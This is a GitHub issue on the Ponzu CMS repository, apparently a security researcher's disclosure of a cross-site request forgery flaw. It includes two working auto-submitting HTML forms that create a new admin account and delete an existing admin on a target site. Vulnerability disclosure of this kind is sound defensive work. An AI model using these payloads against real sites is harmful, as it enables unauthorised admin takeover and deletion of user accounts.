ponzu-cms / ponzu

Headless CMS with automatic JSON API. Featuring auto-HTTPS from Let's Encrypt, HTTP/2 Server Push, and flexible server framework written in Go.
https://docs.ponzu-cms.org
BSD 3-Clause "New" or "Revised" License

Cross-Site Request Forgery in Ponzu CMS. #338

Open Loginsoft-Research opened 4 years ago

Loginsoft-Research commented 4 years ago

Vulnerability Description :- Ponzu CMS is vulnerable to CSRF. The application allows an attacker to create an admin user and delete a user in Ponzu CMS. An attacker can exploit this vulnerability by crafting a malicious page and performing further actions after successful exploitation.

Steps To Reproduce :-

To create an admin account:

```html
<html>
  <body>
    <!-- Auto-submitting form: the victim's browser attaches its admin session cookie to the POST -->
    <form action="http://target.com/admin/configure/users" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="email" value="newadmin@evildomain.com" />
      <input type="hidden" name="password" value="newadminpassword" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>
```

To delete an admin account:

```html
<html>
  <body>
    <!-- Same pattern against the delete endpoint; id and email identify the victim account -->
    <form action="http://target.com/admin/configure/users/delete" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="email" value="admin@example.com" />
      <input type="hidden" name="id" value="1" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>
```